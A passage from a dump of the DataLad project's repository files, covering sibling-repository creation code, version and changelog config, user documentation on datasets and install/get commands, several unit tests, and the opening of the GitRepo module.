siblingname, organization,\n private, dry_run, description, res_kwargs,\n existing, access_protocol,\n publish_depends):\n \"\"\"Create a series of repos on the target platform\n\n This method handles common conditions in a uniform platform-agnostic\n fashion, and sets local sibling configurations for created/located\n repositories.\n\n Yields\n ------\n dict\n Result record\n \"\"\"\n for d, reponame in dsrepo_map:\n res = self.create_repo(\n d, reponame, organization, private, dry_run, description,\n existing)\n # blend reported results with standard properties\n res = dict(\n res,\n **res_kwargs)\n\n if res.get('preexisted') and existing == 'skip':\n # we came here, despite initial checking for conflicting\n # sibling names. 
this means we found an unrelated repo\n res['status'] = 'error'\n res['message'] = (\n \"A repository '%s' already exists at '%s', \"\n \"use existing=reconfigure to use it as a sibling\",\n reponame, self.api_url)\n\n if 'message' not in res:\n if not dry_run:\n res['message'] = (\n \"sibling repository '%s' created at %s\",\n siblingname, res.get('html_url')\n )\n else:\n # can't know url when request was not made\n res['message'] = (\n \"would create sibling '%s' and repository '%s%s'\",\n siblingname,\n organization + \"/\" if organization else \"\",\n reponame\n )\n # report to caller\n yield get_status_dict(**res)\n\n if res['status'] not in ('ok', 'notneeded'):\n # something went wrong, do not proceed\n continue\n\n if dry_run:\n continue\n\n if res['status'] == 'notneeded' \\\n and existing not in ('reconfigure', 'replace'):\n # nothing to do anymore, when no reconfiguration is desired\n continue\n\n # lastly configure the local datasets\n for var_name, var_value in \\\n self.extra_remote_settings.items():\n var = 'remote.{}.{}'.format(siblingname, var_name)\n if existing in ('reconfigure', 'replace'):\n d.config.set(var, var_value, scope='local')\n elif var not in d.config:\n d.config.add(var, var_value, scope='local')\n yield from d.siblings(\n 'configure',\n name=siblingname,\n url=res['ssh_url']\n if access_protocol == 'ssh'\n else res['clone_url'],\n pushurl=res['ssh_url']\n if access_protocol == 'https-ssh' else None,\n recursive=False,\n # TODO fetch=True, maybe only if one existed already\n publish_depends=publish_depends,\n return_type='generator',\n result_renderer='disabled')\n\n def repo_create_request(self, reponame, organization, private,\n dry_run=False, description=None):\n \"\"\"Perform a request to create a repo on the target platform\n\n Also implements reporting of \"fake\" results in dry-run mode.\n\n Returns\n -------\n dict\n Result record, but see repo_create_response() for details.\n \"\"\"\n endpoint = urljoin(\n self.api_url,\n self.create_org_repo_endpoint.format(\n organization=organization)\n if organization else\n self.create_user_repo_endpoint)\n desc_text = description if description is not None else 'some default'\n data = {\n 'name': reponame,\n 'description': desc_text,\n 'private': private,\n 'auto_init': False,\n }\n headers = self.request_headers\n\n if dry_run:\n return dict(\n status='ok',\n request_url=endpoint,\n request_data=data,\n request_headers=headers,\n )\n r = requests.post(\n endpoint,\n json=data,\n headers=headers,\n )\n return self.repo_create_response(r)\n\n def repo_create_response(self, r):\n \"\"\"Handling of repo creation request responses\n\n Normalizes error handling and reporting.\n\n Returns\n -------\n dict\n Result record\n\n Raises\n ------\n Exception\n Raises for any unhandled HTTP error response code.\n \"\"\"\n try:\n response = r.json()\n except Exception as e:\n lgr.debug('Cannot get JSON payload of %s [%s]' , r, e)\n response = {}\n lgr.debug('%s responded with %s %s', self.fullname, r, response)\n if r.status_code == self.response_code_repo_created:\n return dict(\n status='ok',\n preexisted=False,\n # return in full\n host_response=response,\n # perform some normalization\n **self.normalize_repo_properties(response)\n )\n elif r.status_code == requests.codes.unprocessable and \\\n 'already exist' in response.get('message', ''):\n return dict(\n status='impossible',\n message='repository already exists',\n preexisted=True,\n )\n elif r.status_code in (self.response_code_unauthorized,\n 
requests.codes.forbidden):\n return dict(\n status='error',\n message=('unauthorized: %s', response.get('message')),\n )\n elif r.status_code == requests.codes.internal_server_error:\n return dict(\n status='error',\n message=response.get('message', '').strip() or 'Server returned error code %d without any further information' % requests.codes.internal_server_error,\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n # catch-all\n raise RuntimeError(f'Unexpected host response: {response}')\n\n def normalize_repo_properties(self, response):\n \"\"\"Normalize the essential response properties for the result record\n\n Importantly, `clone_url` is a URL that DataLad can directly clone\n from, and that should be the default preferred access method for read\n access by the largest possible audience. Critically, a particular\n platform, might advertise SSH as default, but DataLad might promote\n anonymous HTTP-access as a default, if supported.\n\n Returns\n -------\n dict\n \"\"\"\n return dict(\n reponame=response.get('name'),\n private=response.get('private'),\n clone_url=response.get('clone_url'),\n ssh_url=response.get('ssh_url'),\n html_url=response.get('html_url'),\n )\n\n\ndef _create_sibling(\n platform,\n reponame,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name=None,\n existing='error',\n access_protocol='https',\n publish_depends=None,\n private=False,\n description=None,\n dry_run=False):\n \"\"\"Helper function to conduct sibling creation on a target platform\n\n Parameters match the respective create_sibling_*() commands.\n `platform` is an instance of a subclass of `_GitHubLike`.\n\n Yields\n ------\n dict\n Result record.\n \"\"\"\n\n orgname, reponame = split_org_repo(reponame)\n\n # apply whatever normalization or default selection\n name = platform.get_siblingname(name)\n\n lgr.debug(\"Repository organization name: '%s'\", orgname)\n\n if reponame != platform.normalize_reponame(reponame):\n raise ValueError(\n f'Invalid name for a {platform.fullname} project: {reponame}')\n\n lgr.debug(\"Repository basename: '%s'\", reponame)\n\n # what to operate on\n ds = require_dataset(\n dataset,\n check_installed=True,\n purpose=f'create {platform.fullname} sibling(s)')\n\n res_kwargs = dict(\n action=\\\n f'create_sibling_{platform.name} [dry-run]'\n if dry_run else\n f'create_sibling_{platform.name}',\n logger=lgr,\n refds=ds.path,\n )\n\n toprocess, filterresults = platform.get_dataset_reponame_mapping(\n ds, name, reponame, existing, recursive, recursion_limit,\n res_kwargs\n )\n yield from filterresults\n\n if not toprocess:\n # all skipped\n return\n\n lgr.debug(\"Will process %i dataset(s)\", len(toprocess))\n\n yield from platform.create_repos(\n toprocess,\n name,\n orgname,\n private,\n dry_run,\n description,\n res_kwargs,\n existing,\n access_protocol,\n publish_depends,\n )\n\n\ndef split_org_repo(name):\n \"\"\"Split a potential organization name prefix from a repo's full name\n\n Returns\n -------\n (None, reponame) or (orgname, reponame)\n \"\"\"\n split = name.split('/', maxsplit=1)\n if len(split) < 2:\n return None, name\n else:\n return split[0], split[1]\n\n\ndef _get_present_datasets(ds, recursive, recursion_limit):\n \"\"\"Return list of (sub)dataset instances for all locally present datasets\n \"\"\"\n # gather datasets and essential info\n # dataset instance and mountpoint relative to the top\n toprocess = [ds]\n if recursive:\n for sub in ds.subdatasets(\n # we want to report on missing dataset in here\n 
state='any',\n recursive=recursive,\n recursion_limit=recursion_limit,\n result_xfm='datasets',\n result_renderer='disabled',\n return_type='generator'):\n if not sub.is_installed():\n lgr.info('Ignoring unavailable subdataset %s', sub)\n continue\n toprocess.append(sub)\n return toprocess\n" }, { "alpha_fraction": 0.5525059700012207, "alphanum_fraction": 0.5620524883270264, "avg_line_length": 31.230770111083984, "blob_id": "f689e8954cec54603454267d7bdb72b216acc193", "content_id": "b8464169d243a1a281a9d7aeeb3ab7017973ec78", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 838, "license_type": "permissive", "max_line_length": 92, "num_lines": 26, "path": "/datalad/version.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# Compatibility kludge for now to not break anything relying on datalad.version\n#\n\nimport warnings\n\nfrom ._version import get_versions\n\nwarnings.warn(\n \"datalad.version module will be removed in 0.16. \"\n \"Please use datalad.__version__ (no other __*_version__ variables are to be provided).\",\n DeprecationWarning)\n\n__version__ = get_versions()['version']\n__hardcoded_version__ = __version__\n__full_version__ = __version__\n\ndel get_versions\n" }, { "alpha_fraction": 0.7631579041481018, "alphanum_fraction": 0.7679426074028015, "avg_line_length": 51.25, "blob_id": "a7e57506e584d08ab52a6bc83fc0444000024926", "content_id": "8d1b4c1cbf91a3fd15623c97ac7c3ff50e571bd2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 442, "license_type": "permissive", "max_line_length": 146, "num_lines": 8, "path": "/changelog.d/scriv.ini", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "[scriv]\nfragment_directory = changelog.d\nentry_title_template = file: templates/entry_title.md.j2\nnew_fragment_template = file: templates/new_fragment.md.j2\nformat = md\n# The categories must align with the category names in SEMVER_LABELS in\n# tools/ci/mkchlog-snippet.py\ncategories = 💥 Breaking Changes, 🚀 Enhancements and New Features, 🐛 Bug Fixes, 🔩 Dependencies, 📝 Documentation, 🏠 Internal, 🏎 Performance, 🧪 Tests\n" }, { "alpha_fraction": 0.7425722479820251, "alphanum_fraction": 0.7434880137443542, "avg_line_length": 47.89552307128906, "blob_id": "c5506768dfbd3cb1283b72f1d6c0b3af4f840463", "content_id": "0d627b76910b9fc2eac513d3fddea3389046bc17", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 9828, "license_type": "permissive", "max_line_length": 95, "num_lines": 201, "path": "/docs/source/basics.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_basic_principles:\n\n****************\nBasic principles\n****************\n\nDataLad is designed to be used both as a command-line tool, and as a Python\nmodule. 
The sections :ref:`chap_cmdline` and :ref:`chap_modref` provide\ndetailed description of the commands and functions of the two interfaces. This\nsection presents common concepts. Although examples will frequently be\npresented using command line interface commands, all functionality with\nidentically named functions and options are available through Python API as\nwell.\n\nDatasets\n========\n\nA DataLad :term:`dataset` is a Git repository that may or may not have a data\n:term:`annex` that is used to manage data referenced in a dataset. In practice,\nmost DataLad datasets will come with an annex.\n\nTypes of IDs used in datasets\n-----------------------------\n\nFour types of unique identifiers are used by DataLad to enable identification\nof different aspects of datasets and their components.\n\nDataset ID\n A UUID that identifies a dataset as a whole across its entire history and\n flavors. This ID is stored in a dataset's own configuration file\n (``<dataset root>/.datalad/config``) under the configuration key\n ``datalad.dataset.id``.\n As this configuration is stored in a file that is part of the Git history of\n a dataset, this ID is identical for all \"clones\" of a dataset and across all\n its versions. If the purpose or scope of a dataset changes enough to warrant\n a new dataset ID, it can be changed by altering the dataset configuration\n setting.\nAnnex ID\n A UUID assigned to an annex of each individual clone of a dataset repository.\n Git-annex uses this UUID to track file content availability information. The\n UUID is available under the configuration key ``annex.uuid`` and is stored\n in the configuration file of a local clone (``<dataset root>/.git/config``).\n A single dataset instance (i.e. clone) can only have a single annex UUID,\n but a dataset with multiple clones will have multiple annex UUIDs.\nCommit ID\n A Git hexsha or tag that identifies a version of a dataset. This ID uniquely\n identifies the content and history of a dataset up to its present state. As\n the dataset history also includes the dataset ID, a commit ID of a DataLad\n dataset is unique to a particular dataset.\nContent ID\n Git-annex key (typically a checksum) assigned to the content of a file in\n a dataset's annex. The checksum reflects the content of a file, not its name.\n Hence the content of multiple identical files in a single (or across)\n dataset(s) will have the same checksum. Content IDs are managed by Git-annex\n in a dedicated ``annex`` branch of the dataset's Git repository.\n\n\nDataset nesting\n---------------\n\nDatasets can contain other datasets (:term:`subdataset`\\s), which can in turn\ncontain subdatasets, and so on. There is no limit to the depth of nesting\ndatasets. Each dataset in such a hierarchy has its own annex and its own\nhistory. The parent or :term:`superdataset` only tracks the specific state of a\nsubdataset, and information on where it can be obtained. This is a powerful yet\nlightweight mechanism for combining multiple individual datasets for a specific\npurpose, such as the combination of source code repositories with other\nresources for a tailored application. In many cases DataLad can work with a\nhierarchy of datasets just as if it were a single dataset. Here is a demo:\n\n.. 
include:: basics_nesteddatasets.rst.in\n :start-after: Let's create a dataset\n :end-before: ___________________________\n\n\nDataset collections\n-------------------\n\nA superdataset can also be seen as a curated collection of datasets, for example,\nfor a certain data modality, a field of science, a certain author, or from\none project (maybe the resource for a movie production). This lightweight\ncoupling between super and subdatasets enables scenarios where individual datasets\nare maintained by a disjoint set of people, and the dataset collection itself can\nbe curated by a completely independent entity. Any individual dataset can be\npart of any number of such collections.\n\nBenefiting from Git's support for workflows based on decentralized \"clones\" of\na repository, DataLad's datasets can be (re-)published to a new location\nwithout losing the connection between the \"original\" and the new \"copy\". This\nis extremely useful for collaborative work, but also in more mundane scenarios\nsuch as data backup, or temporary deployment of a dataset on a compute cluster,\nor in the cloud. Using git-annex, data can also get synchronized across\ndifferent locations of a dataset (:term:`sibling`\\s in DataLad terminology).\nUsing metadata tags, it is even possible to configure different levels of\ndesired data redundancy across the network of dataset, or to prevent\npublication of sensitive data to publicly accessible repositories. Individual\ndatasets in a hierarchy of (sub)datasets need not be stored at the same location.\nContinuing with an earlier example, it is possible to post a curated\ncollection of datasets, as a superdataset, on GitHub, while the actual datasets\nlive on different servers all around the world.\n\nBasic command line usage\n========================\n\n.. include:: basics_cmdline.rst.in\n :end-before: ___________________________\n\n\nAPI principles\n==============\n\nYou can use DataLad's ``install`` command to download datasets. The command accepts\nURLs of different protocols (``http``, ``ssh``) as an argument. Nevertheless, the easiest way\nto obtain a first dataset is downloading the default :term:`superdataset` from\nhttps://datasets.datalad.org/ using a shortcut.\n\nDownloading DataLad's default superdataset\n--------------------------------------------\n\nhttps://datasets.datalad.org provides a super-dataset consisting of datasets\nfrom various portals and sites. Many of them were crawled, and periodically\nupdated, using `datalad-crawler <https://github.com/datalad/datalad-crawler>`__\nextension. The argument ``///`` can be used\nas a shortcut that points to the superdataset located at https://datasets.datalad.org/. \nHere are three common examples in command line notation:\n\n``datalad install ///``\n installs this superdataset (metadata without subdatasets) in a\n `datasets.datalad.org/` subdirectory under the current directory\n``datalad install -r ///openfmri``\n installs the openfmri superdataset into an `openfmri/` subdirectory.\n Additionally, the ``-r`` flag recursively downloads all metadata of datasets \n available from http://openfmri.org as subdatasets into the `openfmri/` subdirectory\n``datalad install -g -J3 -r ///labs/haxby``\n installs the superdataset of datasets released by the lab of Dr. James V. Haxby\n and all subdatasets' metadata. 
The ``-g`` flag indicates getting the actual data, too.\n It does so by using 3 parallel download processes (``-J3`` flag).\n\n\nDownloading datasets via http\n-----------------------------\n\nIn most places where DataLad accepts URLs as arguments these URLs can be\nregular ``http`` or ``https`` protocol URLs. For example:\n\n``datalad install https://github.com/psychoinformatics-de/studyforrest-data-phase2.git``\n\nDownloading datasets via ssh\n----------------------------\nDataLad also supports SSH URLs, such as ``ssh://me@localhost/path``.\n\n``datalad install ssh://me@localhost/path``\n\nFinally, DataLad supports SSH login style resource identifiers, such as ``me@localhost:/path``.\n\n``datalad install me@localhost:/path``\n\n\nCommands `install` vs `get`\n---------------------------\n\nThe ``install`` and ``get`` commands might seem confusingly similar at first.\nBoth of them could be used to install any number of subdatasets, and fetch\ncontent of the data files. Differences lie primarily in their default\nbehaviour and outputs, and thus intended use. Both ``install`` and ``get``\ntake local paths as their arguments, but their default behavior and output\nmight differ;\n\n- **install** primarily operates and reports at the level of **datasets**, and\n returns as a result dataset(s)\n which either were just installed, or were installed previously already under\n specified locations. So result should be the same if the same ``install``\n command ran twice on the same datasets. It **does not fetch** data files by\n default\n\n- **get** primarily operates at the level of **paths** (datasets, directories, and/or\n files). As a result it returns only what was installed (datasets) or fetched\n (files). So result of rerunning the same ``get`` command should report that\n nothing new was installed or fetched. It **fetches** data files by default.\n\nIn how both commands operate on provided paths, it could be said that ``install\n== get -n``, and ``install -g == get``. But ``install`` also has ability to\ninstall new datasets from remote locations given their URLs (e.g.,\n``https://datasets.datalad.org/`` for our super-dataset) and SSH targets (e.g.,\n``[login@]host:path``) if they are provided as the argument to its call or\nexplicitly as ``--source`` option. If ``datalad install --source URL\nDESTINATION`` (command line example) is used, then dataset from URL gets\ninstalled under PATH. In case of ``datalad install URL`` invocation, PATH is\ntaken from the last name within URL similar to how ``git clone`` does it. If\nformer specification allows to specify only a single URL and a PATH at a time,\nlater one can take multiple remote locations from which datasets could be\ninstalled.\n\nSo, as a rule of thumb -- if you want to install from external URL or fetch a\nsub-dataset without downloading data files stored under annex -- use ``install``.\nIn Python API ``install`` is also to be used when you want to receive in output the\ncorresponding Dataset object to operate on, and be able to use it even if you\nrerun the script. 
In all other cases, use ``get``.\n" }, { "alpha_fraction": 0.6077724099159241, "alphanum_fraction": 0.6157852411270142, "avg_line_length": 29.814815521240234, "blob_id": "055da9379f22212f86f2f879977b3ac2e6730a84", "content_id": "1ad9508a4f1203f429b49c77499e41f6dddc1c81", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2496, "license_type": "permissive", "max_line_length": 87, "num_lines": 81, "path": "/datalad/interface/tests/test_base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"test the holy grail of interfaces\n\n\"\"\"\n\nfrom datalad.cmd import (\n StdOutCapture,\n WitlessRunner,\n)\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_not_in,\n eq_,\n ok_,\n swallow_outputs,\n with_tempfile,\n)\n\nfrom ..base import update_docstring_with_parameters\n\n\n@with_tempfile(mkdir=True)\ndef test_status_custom_summary_no_repeats(path=None):\n from datalad.api import Dataset\n from datalad.core.local.status import Status\n\n # This regression test depends on the command having a custom summary\n # renderer *and* the particular call producing summary output. status()\n # having this method doesn't guarantee that it is still an appropriate\n # command for this test, but it's at least a necessary condition.\n ok_(hasattr(Status, \"custom_result_summary_renderer\"))\n\n ds = Dataset(path).create()\n out = WitlessRunner(cwd=path).run(\n [\"datalad\", \"--output-format=tailored\", \"status\"],\n protocol=StdOutCapture)\n out_lines = out['stdout'].splitlines()\n ok_(out_lines)\n eq_(len(out_lines), len(set(out_lines)))\n\n with swallow_outputs() as cmo:\n ds.status(return_type=\"list\", result_renderer=\"tailored\")\n eq_(out_lines, cmo.out.splitlines())\n\n\ndef test_update_docstring_with_parameters_no_kwds():\n from datalad.support.param import Parameter\n\n def fn(pos0):\n \"fn doc\"\n\n assert_not_in(\"3\", fn.__doc__)\n # Call doesn't crash when there are no keyword arguments.\n update_docstring_with_parameters(\n fn,\n dict(pos0=Parameter(doc=\"pos0 param doc\"),\n pos1=Parameter(doc=\"pos1 param doc\")),\n add_args={\"pos1\": 3})\n assert_in(\"3\", fn.__doc__)\n\n\ndef test_update_docstring_with_parameters_single_line_prefix():\n from datalad.support.param import Parameter\n\n def fn(pos0, pos1):\n pass\n\n update_docstring_with_parameters(\n fn,\n dict(pos0=Parameter(doc=\"pos0 param doc\"),\n pos1=Parameter(doc=\"pos1 param doc\")),\n prefix=\"This is a single line.\",\n )\n assert_in(\"This is a single line.\\n\\nParameters\\n\", fn.__doc__)\n" }, { "alpha_fraction": 0.5670102834701538, "alphanum_fraction": 0.5733544826507568, "avg_line_length": 44.03571319580078, "blob_id": "6d0bcd696503d05ad843295d7688864b1aa5e6a4", "content_id": "9e3be993893c74d9a615878b2197db1683830fd0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1261, "license_type": "permissive", "max_line_length": 87, "num_lines": 28, "path": "/datalad/tests/test_strings.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# 
emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom ..support.strings import apply_replacement_rules\nfrom .utils_pytest import *\n\n\ndef test_apply_replacement_rules():\n # replacement rule should be at least 3 char long\n assert_raises(ValueError, apply_replacement_rules, '/', 'some')\n assert_raises(ValueError, apply_replacement_rules, ['/a/b', '/'], 'some')\n # and pattern should have the separator only twice\n assert_raises(ValueError, apply_replacement_rules, '/ab', 'some')\n assert_raises(ValueError, apply_replacement_rules, '/a/b/', 'some')\n\n eq_(apply_replacement_rules('/a/b', 'abab'), 'bbbb')\n eq_(apply_replacement_rules('/a/', 'abab'), 'bb')\n eq_(apply_replacement_rules(['/a/b'], 'abab'), 'bbbb')\n eq_(apply_replacement_rules(['/a/b', ',b,ab'], 'abab'), 'abababab')\n\n # with regular expression groups\n eq_(apply_replacement_rules(r'/st(.*)n(.*)$/\\1-\\2', 'string'), 'ri-g')\n" }, { "alpha_fraction": 0.6039362549781799, "alphanum_fraction": 0.6161199808120728, "avg_line_length": 31.530487060546875, "blob_id": "b28aa0815a470912dd722a51895cf58fb6db432d", "content_id": "908512316ed2abbc33b1de8bdc539444e3ee4bbb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5335, "license_type": "permissive", "max_line_length": 78, "num_lines": 164, "path": "/datalad/customremotes/tests/test_ria_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import tempfile\nfrom os.path import join\nfrom urllib.parse import quote\n\nfrom datalad.customremotes import ria_utils\nfrom datalad.customremotes.ria_utils import (\n UnknownLayoutVersion,\n create_ds_in_store,\n create_store,\n verify_ria_url,\n)\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n SSHRemoteIO,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_raises,\n assert_true,\n rmtree,\n skip_ssh,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n on_windows,\n)\n\n\n@with_tempfile\ndef _test_setup_store(io_cls, io_args, store=None):\n io = io_cls(*io_args)\n store = Path(store)\n version_file = store / 'ria-layout-version'\n error_logs = store / 'error_logs'\n\n # invalid version raises:\n assert_raises(UnknownLayoutVersion, create_store, io, store, '2')\n\n # non-existing path should work:\n create_store(io, store, '1')\n assert_true(version_file.exists())\n assert_true(error_logs.exists())\n assert_true(error_logs.is_dir())\n assert_equal([f for f in error_logs.iterdir()], [])\n\n # empty target directory should work as well:\n rmtree(str(store))\n store.mkdir(exist_ok=False)\n create_store(io, store, '1')\n assert_true(version_file.exists())\n assert_true(error_logs.exists())\n assert_true(error_logs.is_dir())\n assert_equal([f for f in error_logs.iterdir()], [])\n\n # re-execution also fine:\n create_store(io, store, '1')\n\n # but version conflict with existing target isn't:\n version_file.write_text(\"2|unknownflags\\n\")\n assert_raises(ValueError, create_store, io, store, '1')\n # TODO: check output reporting conflicting version \"2\"\n\n\ndef test_setup_store():\n\n _test_setup_store(LocalIO, [])\n\n if on_windows:\n raise 
SkipTest('ora_remote.SSHRemoteIO stalls on Windows')\n\n skip_ssh(_test_setup_store)(SSHRemoteIO, ['datalad-test'])\n\n\n@with_tempfile\ndef _test_setup_ds_in_store(io_cls, io_args, store=None):\n io = io_cls(*io_args)\n store = Path(store)\n # ATM create_ds_in_store doesn't care what kind of ID is provided\n dsid = \"abc123456\"\n\n ds_path = store / dsid[:3] / dsid[3:] # store layout version 1\n version_file = ds_path / 'ria-layout-version'\n archives = ds_path / 'archives'\n objects = ds_path / 'annex' / 'objects'\n git_config = ds_path / 'config'\n\n # invalid store version:\n assert_raises(UnknownLayoutVersion,\n create_ds_in_store, io, store, dsid, '1', 'abc')\n\n # invalid obj version:\n assert_raises(UnknownLayoutVersion,\n create_ds_in_store, io, store, dsid, 'abc', '1')\n\n # version 1\n create_store(io, store, '1')\n create_ds_in_store(io, store, dsid, '1', '1')\n for p in [ds_path, archives, objects]:\n assert_true(p.is_dir(), msg=\"Not a directory: %s\" % str(p))\n for p in [version_file]:\n assert_true(p.is_file(), msg=\"Not a file: %s\" % str(p))\n assert_equal(version_file.read_text(), \"1\\n\")\n\n # conflicting version exists at target:\n assert_raises(ValueError, create_ds_in_store, io, store, dsid, '2', '1')\n\n # version 2\n # Note: The only difference between version 1 and 2 are supposed to be the\n # key paths (dirhashlower vs mixed), which has nothing to do with\n # setup routine.\n rmtree(str(store))\n create_store(io, store, '1')\n create_ds_in_store(io, store, dsid, '2', '1')\n for p in [ds_path, archives, objects]:\n assert_true(p.is_dir(), msg=\"Not a directory: %s\" % str(p))\n for p in [version_file]:\n assert_true(p.is_file(), msg=\"Not a file: %s\" % str(p))\n assert_equal(version_file.read_text(), \"2\\n\")\n\n\ndef test_setup_ds_in_store():\n\n _test_setup_ds_in_store(LocalIO, [])\n\n if on_windows:\n raise SkipTest('ora_remote.SSHRemoteIO stalls on Windows')\n\n skip_ssh(_test_setup_ds_in_store)(SSHRemoteIO, ['datalad-test'])\n\n\ndef test_verify_ria_url():\n # unsupported protocol\n assert_raises(ValueError,\n verify_ria_url, 'ria+ftp://localhost/tmp/this', {})\n # bunch of caes that should work\n cases = {\n 'ria+file:///tmp/this': (None, '/tmp/this'),\n # no normalization\n 'ria+file:///tmp/this/': (None, '/tmp/this/'),\n # with hosts\n 'ria+ssh://localhost/tmp/this': ('ssh://localhost', '/tmp/this'),\n 'ria+http://localhost/tmp/this': ('http://localhost', '/tmp/this'),\n 'ria+https://localhost/tmp/this': ('https://localhost', '/tmp/this'),\n # with username\n 'ria+ssh://humbug@localhost/tmp/this':\n ('ssh://humbug@localhost', '/tmp/this'),\n # with port\n 'ria+ssh://humbug@localhost:2222/tmp/this':\n ('ssh://humbug@localhost:2222', '/tmp/this'),\n 'ria+ssh://localhost:2200/tmp/this':\n ('ssh://localhost:2200', '/tmp/this'),\n # with password\n 'ria+https://humbug:1234@localhost:8080/tmp/this':\n ('https://humbug:1234@localhost:8080', '/tmp/this'),\n # document a strange (MIH thinks undesirable), but pre-existing\n # behavior an 'ssh example.com' would end up in the user HOME,\n # not in '/'\n 'ria+ssh://example.com': ('ssh://example.com', '/')\n }\n for i, o in cases.items():\n # we are not testing the URL rewriting here\n assert o == verify_ria_url(i, {})[:2]\n" }, { "alpha_fraction": 0.5551326870918274, "alphanum_fraction": 0.5587309002876282, "avg_line_length": 36.73237609863281, "blob_id": "da05ee694ef5f83e5cdfed4c05acd49c5844949a", "content_id": "e85695461b53fc25bff0fcaabc216bac6fe9a343", "detected_licenses": [ "BSD-3-Clause", "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28903, "license_type": "permissive", "max_line_length": 96, "num_lines": 766, "path": "/datalad/dataset/gitrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Core interface to Git repositories\n\nAt the moment the GitRepo class provided here is not meant to be used\ndirectly, but is primarily a vehicle for a slow refactoring process.\n\nWhile is could be used directly in some cases, note that the singleton\nhandling implemented here will not allow switching between this\nimplementation and the old-standard from datalad.support.gitrepo for the\nlifetime of a singleton.\n\"\"\"\n\n__all__ = ['GitRepo']\n\nimport logging\nimport re\nimport threading\nimport time\nfrom contextlib import contextmanager\nfrom locale import getpreferredencoding\nfrom os import environ\nfrom os.path import lexists\nfrom typing import Optional\nfrom weakref import (\n finalize,\n WeakValueDictionary\n)\n\nfrom datalad.cmd import (\n GitWitlessRunner,\n StdOutErrCapture,\n)\nfrom datalad.config import ConfigManager\nfrom datalad.dataset.repo import (\n PathBasedFlyweight,\n RepoInterface,\n path_based_str_repr,\n)\nfrom datalad.runner.nonasyncrunner import (\n STDERR_FILENO,\n STDOUT_FILENO,\n)\nfrom datalad.runner.protocol import GeneratorMixIn\nfrom datalad.runner.utils import (\n AssemblingDecoderMixIn,\n LineSplitter,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n GitIgnoreError,\n InvalidGitRepositoryError,\n PathKnownToRepositoryError,\n)\nfrom datalad.utils import (\n ensure_list,\n lock_if_required,\n Path,\n)\n\n\nlgr = logging.getLogger('datalad.dataset.gitrepo')\n\npreferred_encoding = getpreferredencoding(do_setlocale=False)\n\n\n@contextmanager\ndef git_ignore_check(expect_fail,\n stdout_buffer,\n stderr_buffer):\n try:\n yield None\n except CommandError as e:\n e.stdout = \"\".join(stdout_buffer) if stdout_buffer else (e.stdout or \"\")\n e.stderr = \"\".join(stderr_buffer) if stderr_buffer else (e.stderr or \"\")\n ignore_exception = _get_git_ignore_exception(e)\n if ignore_exception:\n raise ignore_exception\n lgr.log(5 if expect_fail else 11, str(e))\n raise\n\n\ndef _get_git_ignore_exception(exception):\n ignored = re.search(GitIgnoreError.pattern, exception.stderr)\n if ignored:\n return GitIgnoreError(cmd=exception.cmd,\n msg=exception.stderr,\n code=exception.code,\n stdout=exception.stdout,\n stderr=exception.stderr,\n paths=ignored.groups()[0].splitlines())\n return None\n\n\n@path_based_str_repr\nclass GitRepo(RepoInterface, metaclass=PathBasedFlyweight):\n \"\"\"Representation of a Git repository\n\n \"\"\"\n # Could be used to e.g. disable automatic garbage and autopacking\n # ['-c', 'receive.autogc=0', '-c', 